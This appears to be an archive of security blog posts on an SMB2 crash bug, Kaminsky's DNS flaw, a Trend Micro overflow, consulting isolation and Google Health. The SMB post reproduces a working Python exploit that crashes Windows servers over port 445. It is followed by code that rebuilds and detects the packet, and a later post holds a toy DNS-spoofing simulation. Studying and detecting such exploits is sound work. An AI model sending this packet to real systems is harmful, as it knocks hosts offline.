
You know, sometimes you just have to laugh as the pain gets to be too much.
From Full Disclosure:
SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends to a SMB server, and it's used to identify the SMB dialect that will be used for further communication.
Oh, but there’s more. Proof of concept anyone?
Yup, got that as well over on FD.
Smb-Bsod.py:
#!/usr/bin/python
# When SMB2.0 receives a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA
from socket import socket

host = ("IP_ADDR", 445)  # put the target's address in place of IP_ADDR

buff = (
    b"\x00\x00\x00\x90"  # NetBIOS session message: 0x90 (144) bytes of SMB follow
    b"\xff\x53\x4d\x42"  # Server Component: SMB
    b"\x72\x00\x00\x00"  # Command 0x72: Negotiate Protocol, then the start of NT status
    b"\x00\x18\x53\xc8"  # end of NT status, Flags 0x18, Flags2 0xc853
    b"\x00\x26"          # Process ID High: "&" --> normal value should be "\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"  # signature, reserved, TID, PID
    b"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"  # UID, MID, WordCount 0, ByteCount 0x6d, dialects...
    b"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
    b"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
    b"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
    b"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
    b"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
    b"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
    b"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
    b"\x30\x30\x32\x00"  # ...ending with "SMB 2.002"
)

s = socket()
s.connect(host)
s.send(buff)
s.close()
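If you want to see what that blob actually is rather than eyeball hex, here is an added example (mine, not the Full Disclosure PoC and not Microsoft's code) that rebuilds the same 148-byte packet from its fields with struct, dissects it so Process ID High can be found by offset, and applies the check an IDS rule for this would use: an SMB_COM_NEGOTIATE whose Process ID High is not zero, which the PoC's own comment says should never be the case. The header values and dialect list are copied from the PoC above; the function names and the truncation handling are my own.

```python
#!/usr/bin/env python3
"""Rebuild and dissect the SMB_COM_NEGOTIATE request from the PoC above.

Added example; not the Full Disclosure PoC and not Microsoft code. Header
values and the dialect list are taken from the PoC; function names and the
error handling are mine.
"""
import struct

# SMB1 header (32 bytes, little-endian): Protocol(4) Command(1) Status(4)
# Flags(1) Flags2(2) PIDHigh(2) SecuritySignature(8) Reserved(2) TID(2)
# PID(2) UID(2) MID(2)
SMB_HEADER = struct.Struct("<4sBIBHH8sHHHHH")
SMB_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
# Offset of Process ID High from the start of the NetBIOS session message:
# 4 (NetBIOS) + 4 (magic) + 1 (command) + 4 (status) + 1 (flags) + 2 (flags2)
PID_HIGH_OFFSET = 16

# Dialects offered by the PoC, in its order; the last one is the SMB2 offer.
POC_DIALECTS = [
    "PC NETWORK PROGRAM 1.0",
    "LANMAN1.0",
    "Windows for Workgroups 3.1a",
    "LM1.2X002",
    "LANMAN2.1",
    "NT LM 0.12",
    "SMB 2.002",
]


def build_negotiate(dialects, pid_high=0, flags=0x18, flags2=0xC853,
                    tid=0xFFFF, pid=0xFEFF):
    """Return a NetBIOS session message carrying an SMB_COM_NEGOTIATE.

    Defaults mirror the PoC's header; pid_high=0x2600 packs to the PoC's
    "\\x00\\x26" (little-endian, so the "&" is the high byte).
    """
    # Each dialect is BufferFormat 0x02 followed by a NUL-terminated string.
    body = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    header = SMB_HEADER.pack(SMB_MAGIC, SMB_COM_NEGOTIATE, 0, flags, flags2,
                             pid_high, b"\x00" * 8, 0, tid, pid, 0, 0)
    # Negotiate request: WordCount=0, then ByteCount and the dialect list.
    smb = header + b"\x00" + struct.pack("<H", len(body)) + body
    # NetBIOS session message: type 0x00 and a 24-bit big-endian length.
    return struct.pack(">I", len(smb)) + smb


def parse_negotiate(pkt):
    """Dissect pkt; raise ValueError for anything that is not a well-formed
    NetBIOS-wrapped SMB_COM_NEGOTIATE (truncation, bad magic, wrong command)."""
    if len(pkt) < 4 or pkt[0] != 0x00:
        raise ValueError("not a NetBIOS session message")
    length = int.from_bytes(pkt[1:4], "big")
    smb = pkt[4:4 + length]
    if len(smb) != length or length < SMB_HEADER.size + 3:
        raise ValueError("NetBIOS length %d does not fit an SMB NEGOTIATE" % length)
    (magic, cmd, _status, flags, flags2, pid_high, _sig, _rsv,
     tid, pid, _uid, _mid) = SMB_HEADER.unpack_from(smb)
    if magic != SMB_MAGIC or cmd != SMB_COM_NEGOTIATE:
        raise ValueError("not an SMB_COM_NEGOTIATE")
    word_count = smb[SMB_HEADER.size]
    bc_off = SMB_HEADER.size + 1 + 2 * word_count
    if len(smb) < bc_off + 2:
        raise ValueError("truncated parameter block")
    byte_count = struct.unpack_from("<H", smb, bc_off)[0]
    data = smb[bc_off + 2:bc_off + 2 + byte_count]
    if len(data) != byte_count:
        raise ValueError("ByteCount %d exceeds payload" % byte_count)
    dialects = [d[1:].decode("ascii", "replace")
                for d in data.split(b"\x00") if d.startswith(b"\x02")]
    return {"pid_high": pid_high, "flags": flags, "flags2": flags2,
            "tid": tid, "pid": pid, "byte_count": byte_count,
            "dialects": dialects}


def is_suspicious_negotiate(pkt):
    """The check a signature for this bug boils down to: a NEGOTIATE whose
    Process ID High is non-zero. Anything that does not parse as a NEGOTIATE
    is out of scope for this check and reported as not suspicious."""
    try:
        info = parse_negotiate(pkt)
    except ValueError:
        return False
    return info["pid_high"] != 0


if __name__ == "__main__":
    pkt = build_negotiate(POC_DIALECTS, pid_high=0x2600)
    print(pkt.hex())
    print(parse_negotiate(pkt))
    print("suspicious:", is_suspicious_negotiate(pkt))
```

Run it and compare the hex with the PoC: they are byte-for-byte the same, with the "\x00\x26" sitting at offset 16. The parser deliberately refuses anything truncated or mis-framed instead of guessing, which is the behaviour you want from a dissector fed from a wire tap.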
UPDATE: Here is some more info on this from the site Reverse Mode.
(Image used under CC from ian-s Flickr feed)

One of the most difficult things I have had to deal with in recent years is my transition from a 9-to-5 office to a consultant working from home. While on the surface it may seem like the ideal scenario, and it has its obvious perks, there is a downside.
The isolation is overwhelming at times. Sure, I work for a large shop and I'm part of a 'team' but, regrettably, that is a team only in a virtual sense. I almost never see my team members and occasionally converse with them via email. At no time, however, does this afford any team-building interaction. After six and a half years with a medium-sized shop it is difficult to be suddenly alone.
This is not to say that I don't have friends and family to talk with. This is the absence of co-workers. The absence of a team dynamic. Never thought I would say this but, I really do miss that collegial interaction.
I have received some advice from Hoff, myrcurial and others and I thought I would share this with folks who are newly minted (or re-minted) into the consulting space.
- Exercise. No really, this helps to sharpen focus.
- Schedule meetings in person whenever possible.
- Try to have video conferences if geography is a problem. Virtual face time is better than an email.
- Clearly delineate time. If you work from 8 until 4, stick to it. When working from home you run the real risk of eating into your home life.
- Try to maintain contacts with people in your industry. Attend meetings at hackerspaces, 2600, and various security organizations in your community.
- Attend conferences. Your company might not spring for it but there are many affordable cons, such as Defcon, Shmoocon, Notacon, etc.
- Interact online. Twitter is the current hangout and there are groups of like minded folks online. Zach Lanier is marshaling a group of security professionals called Security Twits that is worth checking out.
Now, this is by no means an exhaustive list. So, this is where you can help out. What helps/helped you maintain your sanity when faced with the isolation that comes with consulting? Feel free to share your experiences or tips so that other folks can benefit from them.
Thanks!
This problem with Trend Micro was issued yesterday.
From Secunia:
Description:
Elazar Broad has discovered some vulnerabilities in Trend Micro OfficeScan, which can be exploited by malicious people to compromise a user's system. The vulnerabilities are caused due to boundary errors in the OfficeScan Corp Edition Web-Deployment ObjRemoveCtrl Class ActiveX control (OfficeScanRemoveCtrl.dll) on an OfficeScan client when attempting to display a list of configuration settings. These can be exploited to cause stack-based buffer overflows by passing overly long properties when a user e.g. visits a malicious web site.
Successful exploitation allows execution of arbitrary code, but requires that OfficeScan client was installed using web deployment.
I can only imagine that this same problem exists in Symantec’s antivirus.
The last-ditch effort by McKinnon to avoid extradition from the UK has failed. Now, his lawyers are taking the case to the European courts.
From CNN:
Gary McKinnon, 42, faces charges in the United States for what officials say were a series of cyber attacks that stole passwords, attacked military networks and wrought hundreds of thousands of dollars worth of computer damage.
The decision by Britain’s House of Lords was his last legal option in this country, but his lawyer said she would appeal his case to the European Court of Human Rights in Strasbourg, France.
“The consequences he faces if extradited are both disproportionate and intolerable and we will be making an immediate application to the European court to prevent his removal,” Karen Todner said after McKinnon’s appeal was rejected. “We believe that the British government declined to prosecute him to enable the U.S. government to make an example of him.”
Well, of course they will make an example of him. They have to be sure to please/protect their alien masters.
heh.

So, unless you’ve been hiding under a rock for the last little while you’ll know that Dan Kaminsky broke DNS in a rather big way.
And you’d know that the gory details hit the tubes of the internet a couple days ago.
Hell, there was even a poem about the whole mess. (bless you Hoff)
Now, the DNS 'sploit has been weaponized. HD Moore and company over at Metasploit have released it. For a full write-up on it check out our friend Nate McFeter's blog posting on the DNS exploit. Yes, it is being actively exploited.
This storm has of course reignited the inevitable (and tiresome) disclosure debate. Let me save you the trouble and cut right to the chase…
PATCH YOUR FSCKING DNS SERVERS.
Consider yourselves warned…again.
OK, I’m tired talking about this subject. What else is going on in the world?
Tags: DNS Exploit, Exploit Code, DNS Hack, HD Moore, |)ruid, Dan Kaminsky
Well, there was a rumble earlier today when Halvar Flake made it known that he had puzzled out Dan Kaminsky’s DNS vulnerability.
From ADD / XOR / ROL:
I know that Dan asked the public researchers to "not speculate publicly" about the vulnerability, in order to buy people time. This is a commendable goal. I respect Dan's viewpoint, but I disagree that this buys anyone time (more on this below). I am fully in agreement with the entire way he handled the vulnerability (e.g. getting the vendors on board, getting the patches made and released, and I understand his decision not to disclose extra information) except the proposed "discussion blackout".
Next up we saw the good folks over at Matasano jump in with their analysis of the DNS exploit.
From Matasano Chargen:
Pretend for the moment that you know only the basic function of DNS — that it translates WWW.VICTIM.COM into 1.2.3.4. The code that does this is called a resolver. Each time the resolver contacts the DNS to translate names to addresses, it creates a packet called a query. The exchange of packets is called a transaction. Since the number of packets flying about on the internet requires scientific notation to express, you can imagine there has to be some way of not mixing them up.
A rather lengthy explanation ensues and is soon taken offline when Thomas Ptacek realizes that the nature of the post is far too informative.
By then, it was too late. Google had already sunk its teeth in.
Matasano published an apology soon afterward:
We removed it from the blog as soon as we saw it. Unfortunately, it takes only seconds for Internet publications to spread.
We dropped the ball here.
Since alerting the Internet earlier in July about the upcoming announcement of his finding, Dan has consistently urged DNS operators to patch their servers. We confirmed the severity of the problem then and, by inadvertently verifying another researcher's results today, reconfirm it today. This is a serious problem, it merits immediate attention, and the extra attention it's receiving today may increase the threat. The Internet needs to patch this problem ASAP.
Dan Kaminsky jumped on Twitter shortly after 11 pm to confirm the worst.
Get yer patch on people.
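The Matasano excerpt above stops right at the interesting question: how does a resolver keep the replies from getting mixed up? The answer is a 16-bit transaction ID in the DNS header, and the numbers below are why that alone is not enough of a secret when the attacker can simply flood forged replies. This is an added example, not code from the original post, from Matasano or from any real resolver. The toy resolver, the fixed source port 53 standing in for an unpatched server, and the constructed answer address are assumptions; the source-port randomization the patches introduced is modelled as roughly 16 more bits the attacker has to guess.

```python
#!/usr/bin/env python3
"""Why a 16-bit DNS transaction ID is not enough on its own.

Added example; not from the original post, Matasano, or any resolver's code.
A toy resolver accepts a reply only if its (transaction ID, destination port)
matches the outstanding query. The attacker never sees the resolver's RNG and
just tries guesses.
"""
import random

ID_BITS = 16        # DNS transaction ID is a 16-bit header field
FIXED_PORT = 53     # assumption: an unpatched resolver sending every query from one port
VICTIM = "www.victim.example"
FORGED_ANSWER = "203.0.113.66"   # constructed, documentation range


def spoof_probability(forged_per_race, races, id_bits=ID_BITS, port_bits=0):
    """Chance that at least one forged reply is accepted when the attacker
    gets `races` outstanding queries to race and sends `forged_per_race`
    distinct guesses for each. port_bits=0 models a fixed source port;
    port_bits=16 is (roughly) source-port randomization."""
    space = 2 ** (id_bits + port_bits)
    per_race = min(forged_per_race, space) / space
    return 1.0 - (1.0 - per_race) ** races


class ToyResolver:
    def __init__(self, rng, randomize_port):
        self.rng = rng
        self.randomize_port = randomize_port
        self.outstanding = {}   # name -> (txid, source port) of the query in flight
        self.cache = {}

    def send_query(self, name):
        txid = self.rng.getrandbits(ID_BITS)
        port = self.rng.randrange(1024, 65536) if self.randomize_port else FIXED_PORT
        self.outstanding[name] = (txid, port)
        return txid, port

    def receive(self, name, txid, dst_port, answer):
        """Accept a reply only if it matches the outstanding query exactly,
        and only once: the first matching reply wins the race."""
        if self.outstanding.get(name) != (txid, dst_port):
            return False
        del self.outstanding[name]
        self.cache[name] = answer
        return True


def make_resolver(seed, randomize_port):
    return ToyResolver(random.Random(seed), randomize_port)


def replies_until_poisoned(randomize_port, seed=1):
    """One race: the attacker answers a single outstanding query with every
    transaction ID in turn (0..65535), guessing the port when it is not fixed.
    Returns (number of forged replies sent up to acceptance, or None if the
    race was lost; the real transaction ID) so the two can be compared."""
    resolver = make_resolver(seed, randomize_port)
    real_txid, _real_port = resolver.send_query(VICTIM)
    attacker = random.Random(seed + 1)   # independent of the resolver's RNG
    for n, txid in enumerate(range(1 << ID_BITS), start=1):
        port = attacker.randrange(1024, 65536) if randomize_port else FIXED_PORT
        if resolver.receive(VICTIM, txid, port, FORGED_ANSWER):
            return n, real_txid
    return None, real_txid


if __name__ == "__main__":
    print("fixed port, 1024 forged replies, one race:   %.4f"
          % spoof_probability(1024, 1))
    print("fixed port, 1024 forged replies, 64 races:   %.4f"
          % spoof_probability(1024, 64))
    print("random port, 1024 forged replies, 64 races:  %.6f"
          % spoof_probability(1024, 64, port_bits=16))
    n, txid = replies_until_poisoned(randomize_port=False)
    print("fixed port: poisoned after %d forged replies (real txid %d)" % (n, txid))
    n, txid = replies_until_poisoned(randomize_port=True)
    print("random port: %s" % ("poisoned after %d replies" % n if n else "race lost"))
```

With a known source port the attacker who enumerates IDs wins after at most 65536 forged replies, a trivial amount of traffic, and on average half that; with the port randomized the same enumeration covers about one part in 2^16 of the space per race. That is the whole difference the patches made, and also why "just a larger ID" was never on the table: the field is 16 bits wide and the port was the only other thing left to randomize without changing the protocol.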

Friday morning in NYC and we’re heading for The Last Hope.
Click here to subscribe to Liquidmatrix Security Digest!
And now, the news…
- Schneier, Team Hack ‘Invisibility Cloak’ for Files | Dark Reading
- HOPE conference highlights everyday hacking | CNET
- Defending against cross-site scripting | Search Security
- Researcher calls out Apple for delaying iPhone patch | Ars Technica
- ‘No decision’ on giant database | BBC News
- Cities Gone Wireless: Safety Or Surveillance? | NPR
- DNSstuff Freeware Detects Vulnerable DNS Servers | eWeek
- Firefox 2 And 3 Get Security Fixes | Information Week
- Man Held In SF City Hacking Case Asks For New Hearing | NBC 11 San Francisco
- Obama Calls for Cyberterror Czar (yet another czar) | Ecommerce Times
Tags: News, Daily Links, Security Blog, Information Security, Security News
OK, sorry for the lack of postings today folks. We've been on the road. Myrcurial made his crossing into the US by bus and yours truly flew into Newark.
Gotta love frequent flier miles.
I'm beat but, I'm looking forward to the Last Hope tomorrow. Myrcurial already has his badge and will be posting shortly (if he hasn't already).
We will be live blogging where possible. Alternatively, you can follow us on Twitter: @gattaca and @myrcurial.
This should be interesting.

Google announced this past summer that they are moving into health care.
From CNN:
Google Inc. will begin storing the medical records of a few thousand people as it tests a long-awaited health service that’s likely to raise more concerns about the volume of sensitive information entrusted to the Internet search leader.
The pilot project to be announced Thursday will involve 1,500 to 10,000 patients at the Cleveland Clinic who volunteered to an electronic transfer of their personal health records so they can be retrieved through Google’s new service, which won’t be open to the general public.
Each health profile, including information about prescriptions, allergies and medical histories, will be protected by a password that’s also required to use other Google services such as e-mail and personalized search tools.
Good thing there is no way to compromise a Gmail account. Phew (in case you might have missed it, that was sarcasm). These problems may or may not still exist. Those links are more for demonstrating that there is a track record established. That notwithstanding, I am a Google fan. So, I'm hopeful that they can do this securely but, by the same token, I'd rather that they didn't have my health records. Not entirely comfortable with that idea to be honest. Third party services do not currently fall under HIPAA.
Tags: Google Health Records, Google Health, Google Data Security

I have a great deal of frustration with some antivirus products, as our long-term readers might be aware. A couple of sites that I have started using (which I should have been using for some time) are VirusTotal.com and Jotti.org. These are sites where you can upload suspected malicious software and then have it run through a gamut of virus scanners with the latest signatures. There are others out there but, the point of this is to share it with the readership. The reason behind this is that I have encountered behaviour in some AV products that made me wonder if it was losing its marbles and I wanted to check against other clients.
For a lot of you the sites are akin to discovering Tuesday. However, folks don’t all start by going to 11. So, if you have other sites that you use feel free to share them. There are also malware search engines that I tend to use such as Offensive Computing. Incidentally, Offensive just received a “bad” rating from McAfee’s SiteAdvisor (if you use that) for which they really can find no issue. After all there is malicious code being researched there.
Anyway, I just thought I’d share those links. Have any you’d like to share?
Tags: Antivirus, Malicious Code